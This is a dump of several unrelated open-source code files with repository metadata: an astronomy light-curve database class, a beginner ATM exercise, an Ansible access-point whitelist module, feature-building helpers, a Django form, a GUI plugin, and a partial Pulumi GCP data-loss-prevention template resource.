] | 5 | 2021-08-19T00:54:57.000Z | 2022-02-10T00:15:40.000Z | ramjet/photometric_database/derived/moa_survey_none_single_and_binary_database.py | golmschenk/ramjet | 77fb4481a15088923308fda09804d80455d1a9cf | [
"Apache-2.0"
] | 3 | 2019-07-12T21:00:57.000Z | 2020-06-03T22:18:13.000Z | """
Code for a database of MOA light curves including non-microlensing, single lensing, and binary lensing collections.
"""
from ramjet.data_interface.moa_data_interface import MoaDataInterface
from ramjet.photometric_database.derived.moa_survey_light_curve_collection import MoaSurveyLightCurveCollection
from ramjet.photometric_database.standard_and_injected_light_curve_database import \
StandardAndInjectedLightCurveDatabase, OutOfBoundsInjectionHandlingMethod, BaselineFluxEstimationMethod
class MoaSurveyNoneSingleAndBinaryDatabase(StandardAndInjectedLightCurveDatabase):
    """
    A class for a database of MOA light curves including non-microlensing, single lensing, and binary lensing
    collections.
    """
    # Interface to the MOA survey data; class-level, so it is shared by all
    # instances of this database.
    moa_data_interface = MoaDataInterface()
| 59.483871 | 120 | 0.638015 | """
Code for a database of MOA light curves including non-microlensing, single lensing, and binary lensing collections.
"""
from ramjet.data_interface.moa_data_interface import MoaDataInterface
from ramjet.photometric_database.derived.moa_survey_light_curve_collection import MoaSurveyLightCurveCollection
from ramjet.photometric_database.standard_and_injected_light_curve_database import \
StandardAndInjectedLightCurveDatabase, OutOfBoundsInjectionHandlingMethod, BaselineFluxEstimationMethod
class MoaSurveyNoneSingleAndBinaryDatabase(StandardAndInjectedLightCurveDatabase):
    """
    A class for a database of MOA light curves including non-microlensing, single lensing, and binary lensing
    collections.
    """
    # Class-level (shared) accessor for the MOA survey data; also supplies the
    # sentinel tag used for untagged light curves (`no_tag_string`).
    moa_data_interface = MoaDataInterface()
    def __init__(self):
        super().__init__()
        # One scalar label per light curve (labels below are 0 or 1).
        self.number_of_label_values = 1
        self.number_of_parallel_processes_per_map = 5
        self.time_steps_per_example = 18000
        self.out_of_bounds_injection_handling = OutOfBoundsInjectionHandlingMethod.RANDOM_INJECTION_LOCATION
        self.baseline_flux_estimation_method = BaselineFluxEstimationMethod.MEDIAN_ABSOLUTE_DEVIATION
        self.shuffle_buffer_size = 1000
        self.include_time_as_channel = True
        # self.include_flux_errors_as_channel = True
        # Dataset splits 0-7 are used for training; split 8 is validation and
        # split 9 inference (see the collections below).
        # NOTE(review): the survey tag meanings ('v', 'n', 'nr', 'm', 'j' as
        # non-microlensing, 'c*' as candidates, 'cb' as binary) are inferred
        # from the label assignments here -- confirm against the MOA tag scheme.
        negative_training = MoaSurveyLightCurveCollection(
            survey_tags=['v', 'n', 'nr', 'm', 'j', self.moa_data_interface.no_tag_string], label=0,
            dataset_splits=list(range(8)))
        # Ordering matters downstream: negatives first, then label-0 candidate
        # tags, then the label-1 'cb' collection.
        self.training_standard_light_curve_collections = [
            negative_training,
            MoaSurveyLightCurveCollection(survey_tags=['c', 'cf', 'cp', 'cw', 'cs', 'cb'], label=0,
                                          dataset_splits=list(range(8))),
            MoaSurveyLightCurveCollection(survey_tags=['cb'], label=1,
                                          dataset_splits=list(range(8)))
        ]
        # Disabled synthetic-signal injection configuration, kept for reference.
        # self.training_injectee_light_curve_collection = negative_training
        # self.training_injectable_light_curve_collections = [
        #     # MicrolensingSyntheticGeneratedDuringRunningSignalCollection(),
        #     # MicrolensingSyntheticApproximatePsplGeneratedDuringRunningSignalCollection()
        #     MoaSurveyLightCurveCollection(survey_tags=['c', 'cf', 'cp', 'cw', 'cs', 'cb'], label=0,
        #                                   dataset_splits=list(range(8))),
        #     MoaSurveyLightCurveCollection(survey_tags=['cb'], label=1,
        #                                   dataset_splits=list(range(8)))
        # ]
        # Validation uses the same tag/label partition as training, on split 8.
        self.validation_standard_light_curve_collections = [
            MoaSurveyLightCurveCollection(survey_tags=['v', 'n', 'nr', 'm', 'j', self.moa_data_interface.no_tag_string],
                                          label=0, dataset_splits=[8]),
            MoaSurveyLightCurveCollection(survey_tags=['c', 'cf', 'cp', 'cw', 'cs', 'cb'], label=0,
                                          dataset_splits=[8]),
            MoaSurveyLightCurveCollection(survey_tags=['cb'], label=1,
                                          dataset_splits=[8])
        ]
        # Inference uses the held-out split 9.
        self.inference_light_curve_collections = [
            MoaSurveyLightCurveCollection(survey_tags=['v', 'n', 'nr', 'm', 'j', self.moa_data_interface.no_tag_string],
                                          label=0, dataset_splits=[9]),
            MoaSurveyLightCurveCollection(survey_tags=['c', 'cf', 'cp', 'cw', 'cs', 'cb'], label=0,
                                          dataset_splits=[9]),
            MoaSurveyLightCurveCollection(survey_tags=['cb'], label=1,
                                          dataset_splits=[9])
        ]
| 2,890 | 0 | 27 |
f0162ff4ea770a97740eab3aed1b1f3a2c45254f | 1,576 | py | Python | exercicios curso em video/ex071.py | Nilton-Miguel/Prog_Python3 | 4cabcb1a30dde6ababce3cb8d1fbb7d417cb1d8b | [
"MIT"
] | null | null | null | exercicios curso em video/ex071.py | Nilton-Miguel/Prog_Python3 | 4cabcb1a30dde6ababce3cb8d1fbb7d417cb1d8b | [
"MIT"
] | null | null | null | exercicios curso em video/ex071.py | Nilton-Miguel/Prog_Python3 | 4cabcb1a30dde6ababce3cb8d1fbb7d417cb1d8b | [
"MIT"
] | null | null | null | valor = str(input('Valor para saque: ').strip())
# ATM note dispenser: break `valor` (read above as a string) into notes of
# R$ 100, 50, 20, 10, 5 and 2.
last = valor[len(valor) - 1]  # last digit of the typed amount, as a character
valor = int(valor)
# NOTE(review): this only "corrects" amounts whose last digit is 1, yet 21,
# 31, ... ARE dispensable (e.g. 21 = 5 + 8x2); only 1 and 3 are impossible.
if last == '1':
    valor += 1
    print(f'o valor precisou ser corrigido para R${valor},00 pois não há notas de R$ 1,00 disponíveis')
print()
# Note counters, largest to smallest denomination.
tot100 = tot50 = tot20 = tot10 = tot5 = tot2 = 0
# Greedy loop: take the largest note that fits. A R$ 5 note is only used while
# the remainder is odd, R$ 2 notes only while it is even.
# NOTE(review): amounts such as 13 or 33 reach a remainder of 3 (odd, < 5) and
# silently `break` with money undelivered -- confirm this is intended.
while True:
    if valor // 100 > 0:
        tot100 += 1
        valor -= 100
    elif valor // 50 > 0:
        tot50 += 1
        valor -= 50
    elif valor // 20 > 0:
        tot20 += 1
        valor -= 20
    elif valor // 10 > 0:
        tot10 += 1
        valor -= 10
    elif valor // 5 > 0 and ((valor % 2) == 1):
        tot5 += 1
        valor -= 5
    elif valor // 2 > 0 and ((valor % 2) == 0):
        tot2 += 1
        valor -= 2
    else:
        break
# Report each denomination actually used, with singular/plural agreement.
if tot100 > 0:
    if tot100 == 1:
        A = 'nota'
    else:
        A = 'notas'
    print(f'{tot100} {A} de R$ 100,00')
if tot50 > 0:
    if tot50 == 1:
        A = 'nota'
    else:
        A = 'notas'
    print(f'{tot50} {A} de R$ 50,00')
if tot20 > 0:
    if tot20 == 1:
        A = 'nota'
    else:
        A = 'notas'
    print(f'{tot20} {A} de R$ 20,00')
if tot10 > 0:
    if tot10 == 1:
        A = 'nota'
    else:
        A = 'notas'
    print(f'{tot10} {A} de R$ 10,00')
if tot5 > 0:
    if tot5 == 1:
        A = 'nota'
    else:
        A = 'notas'
    print(f'{tot5} {A} de R$ 5,00')
if tot2 > 0:
    if tot2 == 1:
        A = 'nota'
    else:
        A = 'notas'
    print(f'{tot2} {A} de R$ 2,00')
print()
| 19.7 | 104 | 0.425127 | valor = str(input('Valor para saque: ').strip())
last = valor[len(valor) - 1]
valor = int(valor)
if last == '1':
valor += 1
print(f'o valor precisou ser corrigido para R${valor},00 pois não há notas de R$ 1,00 disponíveis')
print()
tot100 = tot50 = tot20 = tot10 = tot5 = tot2 = 0
while True:
if valor // 100 > 0:
tot100 += 1
valor -= 100
elif valor // 50 > 0:
tot50 += 1
valor -= 50
elif valor // 20 > 0:
tot20 += 1
valor -= 20
elif valor // 10 > 0:
tot10 += 1
valor -= 10
elif valor // 5 > 0 and ((valor % 2) == 1):
tot5 += 1
valor -= 5
elif valor // 2 > 0 and ((valor % 2) == 0):
tot2 += 1
valor -= 2
else:
break
if tot100 > 0:
if tot100 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot100} {A} de R$ 100,00')
if tot50 > 0:
if tot50 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot50} {A} de R$ 50,00')
if tot20 > 0:
if tot20 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot20} {A} de R$ 20,00')
if tot10 > 0:
if tot10 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot10} {A} de R$ 10,00')
if tot5 > 0:
if tot5 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot5} {A} de R$ 5,00')
if tot2 > 0:
if tot2 == 1:
A = 'nota'
else:
A = 'notas'
print(f'{tot2} {A} de R$ 2,00')
print()
| 0 | 0 | 0 |
cfea1adda1cef4fa8dfdce519ed08e934086381e | 4,414 | py | Python | library/aos_cap_whitelist.py | jayp193/aos-wlan-ansible-role | 0e8ef5d3a890bed6b0e402f92d6aaedf5d8bf9fb | [
"Apache-2.0"
] | 2 | 2020-07-20T15:51:45.000Z | 2022-02-22T12:23:48.000Z | library/aos_cap_whitelist.py | jayp193/aos-wlan-ansible-role | 0e8ef5d3a890bed6b0e402f92d6aaedf5d8bf9fb | [
"Apache-2.0"
] | 2 | 2020-06-23T20:58:22.000Z | 2021-02-02T18:13:33.000Z | library/aos_cap_whitelist.py | jayp193/aos-wlan-ansible-role | 0e8ef5d3a890bed6b0e402f92d6aaedf5d8bf9fb | [
"Apache-2.0"
] | 2 | 2020-06-23T21:42:20.000Z | 2021-06-04T04:20:59.000Z |
#!/usr/bin/python3
'''
Module for Whitelisting Access Points
'''
# -*- coding: utf-8 -*-
# (C) Copyright 2020 Hewlett Packard Enterprise Development LP.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: aos_cap_whitelist
version_added: 2.8.1
short_description: Whitelist Campus Access Points (CAP)
description: Module for whitelisting Campus Access Points on the controller under
the Mobility Master or a Standalone Controller
options:
action:
description:
        - Type of action to be performed for whitelisting Campus Access Points
require: true
choices:
- add
- delete
type: str
ap_name:
description:
- Name you would like to give to the the Access Point
required: false
type: str
ap_group:
description:
- Name of AP group where the Access Point needs to be added
required: false
type: str
mac_address:
description:
- MAC address of the Campus Access Point
required: true
type: str
description:
description:
- Short description for the Access Point
required: false
type: str
"""
EXAMPLES = """
#Usage Examples
- name: Whitelist an Access Point to default AP-Group
aos_cap_whitelist:
action: add
ap_name: test-ap-1
ap_group: default
mac_address: "ab:32:32:32:32:32"
description: Boston office, building 6, 2nd floor
- name: Whitelist an Access Point to configured AP-Group
aos_cap_whitelist:
ap_name: test-ap-2
ap_group: test-ap-group
mac_address: "zx:32:32:32:32:33"
description: This is just for testing
- name: Delete an Access Point from Whitelist
aos_cap_whitelist:
action: delete
mac_address: "ab:32:32:32:32:32"
- name: Delete an Access Point from Whitelist
aos_cap_whitelist:
ap_name: test-ap-2
ap_group: test-ap-group
mac_address: "zx:32:32:32:32:33"
description: This is just for testing
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.aos_http import AosApi
if __name__ == '__main__':
main()
| 31.084507 | 86 | 0.647938 |
#!/usr/bin/python3
'''
Module for Whitelisting Access Points
'''
# -*- coding: utf-8 -*-
# (C) Copyright 2020 Hewlett Packard Enterprise Development LP.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = """
---
module: aos_cap_whitelist
version_added: 2.8.1
short_description: Whitelist Campus Access Points (CAP)
description: Module for whitelisting Campus Access Points on the controller under
the Mobility Master or a Standalone Controller
options:
action:
description:
        - Type of action to be performed for whitelisting Campus Access Points
require: true
choices:
- add
- delete
type: str
ap_name:
description:
- Name you would like to give to the the Access Point
required: false
type: str
ap_group:
description:
- Name of AP group where the Access Point needs to be added
required: false
type: str
mac_address:
description:
- MAC address of the Campus Access Point
required: true
type: str
description:
description:
- Short description for the Access Point
required: false
type: str
"""
EXAMPLES = """
#Usage Examples
- name: Whitelist an Access Point to default AP-Group
aos_cap_whitelist:
action: add
ap_name: test-ap-1
ap_group: default
mac_address: "ab:32:32:32:32:32"
description: Boston office, building 6, 2nd floor
- name: Whitelist an Access Point to configured AP-Group
aos_cap_whitelist:
ap_name: test-ap-2
ap_group: test-ap-group
mac_address: "zx:32:32:32:32:33"
description: This is just for testing
- name: Delete an Access Point from Whitelist
aos_cap_whitelist:
action: delete
mac_address: "ab:32:32:32:32:32"
- name: Delete an Access Point from Whitelist
aos_cap_whitelist:
ap_name: test-ap-2
ap_group: test-ap-group
mac_address: "zx:32:32:32:32:33"
description: This is just for testing
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.aos_http import AosApi
def main():
    """Ansible entry point: add or remove a campus AP in the CPSec whitelist.

    Builds the controller REST payload from the module arguments, posts it
    through AosApi, and exits with the controller's ``_global_result`` status
    (``status == 0`` means success).
    """
    module = AnsibleModule(
        argument_spec=dict(
            action=dict(required=True, type='str', choices=['add', 'delete']),
            ap_name=dict(required=False, type='str'),
            ap_group=dict(required=False, type='str'),
            mac_address=dict(required=True, type='str'),
            description=dict(required=False, type='str')
        ))
    action = module.params.get('action')
    ap_name = module.params.get('ap_name')
    ap_group = module.params.get('ap_group')
    mac_address = module.params.get('mac_address')
    description = module.params.get('description')
    api = AosApi(module)
    if action == 'add':
        config_url = "/v1/configuration/object/wdb_cpsec_add_mac?"
        data = {"description": description, "ap_name": ap_name, "ap_group": ap_group,
                "name": str(mac_address)}
    else:  # action == 'delete' -- argument_spec choices guarantee one of the two
        config_url = "/v1/configuration/object/wdb_cpsec_del_mac?"
        data = {"name": str(mac_address)}
    result, changed = api.post(url=config_url, data=data)
    resp = result['resp']
    # BUG FIX: dict.has_key() was removed in Python 3 and raised AttributeError
    # under the python3 shebang; use dict.get()/`in` instead. Also avoid a
    # KeyError on the failure path when "_global_result" is absent.
    global_result = resp.get("_global_result", {})
    if global_result.get("status") == 0:
        module.exit_json(changed=changed, response=resp, response_code=result['code'])
    else:
        module.fail_json(changed=False, response=resp, response_code=result['code'],
                         msg=str(global_result.get("status_str", "unknown error")))
if __name__ == '__main__':
main()
| 1,395 | 0 | 23 |
7da31b17c2cd6923e482d3e74dbd413d9877b147 | 1,488 | py | Python | ramp/builders.py | Marigold/ramp | f9ddea84bc3b5097c0ddb8a3f71a0fce1775ba76 | [
"MIT"
] | 1 | 2015-03-12T23:51:10.000Z | 2015-03-12T23:51:10.000Z | ramp/builders.py | Marigold/ramp | f9ddea84bc3b5097c0ddb8a3f71a0fce1775ba76 | [
"MIT"
] | null | null | null | ramp/builders.py | Marigold/ramp | f9ddea84bc3b5097c0ddb8a3f71a0fce1775ba76 | [
"MIT"
] | null | null | null | from configuration import *
from features.base import BaseFeature, Feature, ConstantFeature
from utils import _pprint, get_single_column
from pandas import concat, DataFrame, Series, Index
import numpy as np
| 31 | 93 | 0.668011 | from configuration import *
from features.base import BaseFeature, Feature, ConstantFeature
from utils import _pprint, get_single_column
from pandas import concat, DataFrame, Series, Index
import numpy as np
def build_target(target, context):
    """Create the prediction target for *context* and return it as a single column."""
    return get_single_column(target.create(context))
def build_feature_safe(feature, context):
    """Create a single feature's DataFrame and sanity-check the result.

    Problems (constant columns, NaNs) are printed as warnings rather than
    raised, so one bad feature does not abort the whole featureset build.
    Note: this module uses Python 2 print statements.
    """
    d = feature.create(context)
    # sanity check index is valid -- NOTE(review): relies on old pandas where
    # Index.__sub__ is set difference (no labels outside context.data.index);
    # modern pandas changed this operator. Verify the pinned pandas version.
    assert not d.index - context.data.index
    # columns probably shouldn't be constant...
    if not isinstance(feature, ConstantFeature):
        if any(d.std() < 1e-9):
            print "\n\nWARNING: Feature '%s' has constant column. \n\n" % feature.unique_name
    # we probably dont want NANs here...
    if np.isnan(d.values).any():
        # TODO HACK: this is not right. (why isn't it right???)
        # Columns named with the predictions prefix are exempt from the NaN warning.
        if not feature.unique_name.startswith(
                Configuration.DEFAULT_PREDICTIONS_NAME):
            print "\n\n***** WARNING: NAN in feature '%s' *****\n\n"%feature.unique_name
    return d
def build_featureset(features, context):
    """Build every feature in *features* and concatenate them column-wise.

    Asserts that no two features share a unique_name and that all created
    frames agree on their index. Returns None when *features* is empty.
    """
    # check for dupes
    names = set(f.unique_name for f in features)
    assert len(features) == len(names), "duplicate feature"
    if not features:
        return
    frames = [build_feature_safe(f, context) for f in features]
    base_index = frames[0].index
    for frame in frames[1:]:
        assert (frame.index == base_index).all(), "Mismatched indices after feature creation"
    return concat(frames, axis=1)
| 1,206 | 0 | 69 |
9a22382029101b296f687c549cf395c5ad741718 | 497 | py | Python | core/forms.py | igr-santos/merit-market | a7bf8cc00071f63e8e98826c2c19d93120dbece9 | [
"MIT"
] | 1 | 2021-07-07T14:18:29.000Z | 2021-07-07T14:18:29.000Z | core/forms.py | igr-santos/merit-market | a7bf8cc00071f63e8e98826c2c19d93120dbece9 | [
"MIT"
] | null | null | null | core/forms.py | igr-santos/merit-market | a7bf8cc00071f63e8e98826c2c19d93120dbece9 | [
"MIT"
] | null | null | null | # coding: utf-8
from django import forms
from .models import Transaction
from .models import Customer
| 27.611111 | 74 | 0.682093 | # coding: utf-8
from django import forms
from .models import Transaction
from .models import Customer
class TransactionForm(forms.ModelForm):
    """Form for creating a merit Transaction aimed at another customer.

    The ``receiver`` choices are restricted per-request in ``__init__`` to
    every Customer except the acting user, so a user cannot pick themselves.
    ``giver`` is excluded from the form fields (presumably set by the view
    from the request user -- verify the caller).
    """
    # Placeholder queryset; the real, per-request choices are assigned in
    # __init__. Fixed inconsistency: the placeholder previously queried
    # Transaction, but this field selects Customer rows.
    receiver = forms.ModelChoiceField(queryset=Customer.objects.none())

    def __init__(self, user, *args, **kwargs):
        """Build the form, limiting receiver choices to customers other than *user*."""
        super(TransactionForm, self).__init__(*args, **kwargs)
        self.fields['receiver'].queryset = Customer.objects.exclude(
            user=user)

    class Meta:
        model = Transaction
        exclude = ('giver', )
| 176 | 195 | 23 |
4e4b53e919c63e339641271dbfe16dbeb4021ed4 | 401 | py | Python | guikit/extensions/example_plugin/notebook.py | ImperialCollegeLondon/guikit | 721b3ac976d254f0f95c3f0bebb43669f310fd02 | [
"BSD-3-Clause"
] | 3 | 2022-01-20T12:13:26.000Z | 2022-01-20T12:42:03.000Z | guikit/extensions/example_plugin/notebook.py | ImperialCollegeLondon/python-gui-template | 721b3ac976d254f0f95c3f0bebb43669f310fd02 | [
"BSD-3-Clause"
] | 14 | 2021-09-21T15:19:36.000Z | 2021-11-28T00:05:32.000Z | guikit/extensions/example_plugin/notebook.py | ImperialCollegeLondon/guikit | 721b3ac976d254f0f95c3f0bebb43669f310fd02 | [
"BSD-3-Clause"
] | null | null | null | import wx
from guikit.plugins import PluginBase, Tab
| 23.588235 | 60 | 0.57606 | import wx
from guikit.plugins import PluginBase, Tab
class NotebookPlugin(PluginBase):
def tabs(self, parent):
text1 = Tab(
page=wx.TextCtrl(parent, style=wx.TE_MULTILINE),
text="Text area",
)
text2 = Tab(
page=wx.TextCtrl(parent, style=wx.TE_MULTILINE),
text="A second text area",
)
return [text1, text2]
| 285 | 12 | 49 |
28738d283bf4868349454e25d748bec7dc9a9c6f | 33,650 | py | Python | sdk/python/pulumi_gcp/dataloss/prevention_deidentify_template.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 121 | 2018-06-18T19:16:42.000Z | 2022-03-31T06:06:48.000Z | sdk/python/pulumi_gcp/dataloss/prevention_deidentify_template.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 492 | 2018-06-22T19:41:03.000Z | 2022-03-31T15:33:53.000Z | sdk/python/pulumi_gcp/dataloss/prevention_deidentify_template.py | sisisin/pulumi-gcp | af6681d70ea457843409110c1324817fe55f68ad | [
"ECL-2.0",
"Apache-2.0"
] | 43 | 2018-06-19T01:43:13.000Z | 2022-03-23T22:43:37.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PreventionDeidentifyTemplateArgs', 'PreventionDeidentifyTemplate']
@pulumi.input_type
@pulumi.input_type
| 56.841216 | 422 | 0.624101 | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['PreventionDeidentifyTemplateArgs', 'PreventionDeidentifyTemplate']
@pulumi.input_type
class PreventionDeidentifyTemplateArgs:
    """Constructor arguments for the ``PreventionDeidentifyTemplate`` resource.

    Generated by the Pulumi Terraform bridge (tfgen) -- keep hand edits to
    documentation only. ``deidentify_config`` and ``parent`` are required;
    ``description`` and ``display_name`` are optional. Values are stored via
    ``pulumi.set``/``pulumi.get``, the bridge's input-property protocol.
    """
    def __init__(__self__, *,
                 deidentify_config: pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs'],
                 parent: pulumi.Input[str],
                 description: Optional[pulumi.Input[str]] = None,
                 display_name: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a PreventionDeidentifyTemplate resource.
        :param pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs'] deidentify_config: Configuration of the deidentify template
               Structure is documented below.
        :param pulumi.Input[str] parent: The parent of the template in any of the following formats:
               * `projects/{{project}}`
               * `projects/{{project}}/locations/{{location}}`
               * `organizations/{{organization_id}}`
               * `organizations/{{organization_id}}/locations/{{location}}`
        :param pulumi.Input[str] description: A description of the template.
        :param pulumi.Input[str] display_name: User set display name of the template.
        """
        pulumi.set(__self__, "deidentify_config", deidentify_config)
        pulumi.set(__self__, "parent", parent)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if display_name is not None:
            pulumi.set(__self__, "display_name", display_name)
    @property
    @pulumi.getter(name="deidentifyConfig")
    def deidentify_config(self) -> pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs']:
        """
        Configuration of the deidentify template
        Structure is documented below.
        """
        return pulumi.get(self, "deidentify_config")
    @deidentify_config.setter
    def deidentify_config(self, value: pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs']):
        pulumi.set(self, "deidentify_config", value)
    @property
    @pulumi.getter
    def parent(self) -> pulumi.Input[str]:
        """
        The parent of the template in any of the following formats:
        * `projects/{{project}}`
        * `projects/{{project}}/locations/{{location}}`
        * `organizations/{{organization_id}}`
        * `organizations/{{organization_id}}/locations/{{location}}`
        """
        return pulumi.get(self, "parent")
    @parent.setter
    def parent(self, value: pulumi.Input[str]):
        pulumi.set(self, "parent", value)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        A description of the template.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> Optional[pulumi.Input[str]]:
        """
        User set display name of the template.
        """
        return pulumi.get(self, "display_name")
    @display_name.setter
    def display_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "display_name", value)
@pulumi.input_type
class _PreventionDeidentifyTemplateState:
    """Input state for looking up and filtering existing
    ``PreventionDeidentifyTemplate`` resources.

    Generated by the Pulumi Terraform bridge (tfgen) -- keep hand edits to
    documentation only. Every field is optional; only supplied values are
    stored (via ``pulumi.set``).
    """
    def __init__(__self__, *,
                 deidentify_config: Optional[pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs']] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 parent: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering PreventionDeidentifyTemplate resources.
        :param pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs'] deidentify_config: Configuration of the deidentify template
               Structure is documented below.
        :param pulumi.Input[str] description: A description of the template.
        :param pulumi.Input[str] display_name: User set display name of the template.
        :param pulumi.Input[str] name: The resource name of the template. NOTE(review): the generated
               description here originally documented an infoType name, which appears
               copy-pasted from another field -- confirm against the provider schema.
        :param pulumi.Input[str] parent: The parent of the template in any of the following formats:
               * `projects/{{project}}`
               * `projects/{{project}}/locations/{{location}}`
               * `organizations/{{organization_id}}`
               * `organizations/{{organization_id}}/locations/{{location}}`
        """
        if deidentify_config is not None:
            pulumi.set(__self__, "deidentify_config", deidentify_config)
        if description is not None:
            pulumi.set(__self__, "description", description)
        if display_name is not None:
            pulumi.set(__self__, "display_name", display_name)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if parent is not None:
            pulumi.set(__self__, "parent", parent)
    @property
    @pulumi.getter(name="deidentifyConfig")
    def deidentify_config(self) -> Optional[pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs']]:
        """
        Configuration of the deidentify template
        Structure is documented below.
        """
        return pulumi.get(self, "deidentify_config")
    @deidentify_config.setter
    def deidentify_config(self, value: Optional[pulumi.Input['PreventionDeidentifyTemplateDeidentifyConfigArgs']]):
        pulumi.set(self, "deidentify_config", value)
    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        A description of the template.
        """
        return pulumi.get(self, "description")
    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)
    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> Optional[pulumi.Input[str]]:
        """
        User set display name of the template.
        """
        return pulumi.get(self, "display_name")
    @display_name.setter
    def display_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "display_name", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The template name. NOTE(review): the generated docstring described an
        infoType name pattern here; that text looks copy-pasted from another
        resource's field -- confirm against the provider schema.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter
    def parent(self) -> Optional[pulumi.Input[str]]:
        """
        The parent of the template in any of the following formats:
        * `projects/{{project}}`
        * `projects/{{project}}/locations/{{location}}`
        * `organizations/{{organization_id}}`
        * `organizations/{{organization_id}}/locations/{{location}}`
        """
        return pulumi.get(self, "parent")
    @parent.setter
    def parent(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "parent", value)
class PreventionDeidentifyTemplate(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
deidentify_config: Optional[pulumi.Input[pulumi.InputType['PreventionDeidentifyTemplateDeidentifyConfigArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
parent: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Allows creation of templates to de-identify content.
To get more information about DeidentifyTemplate, see:
* [API documentation](https://cloud.google.com/dlp/docs/reference/rest/v2/projects.deidentifyTemplates)
* How-to Guides
* [Official Documentation](https://cloud.google.com/dlp/docs/concepts-templates)
## Example Usage
### Dlp Deidentify Template Basic
```python
import pulumi
import pulumi_gcp as gcp
basic = gcp.dataloss.PreventionDeidentifyTemplate("basic",
deidentify_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigArgs(
info_type_transformations=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsArgs(
transformations=[
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="FIRST_NAME",
)],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
replace_with_info_type_config=True,
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="PHONE_NUMBER",
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="AGE",
),
],
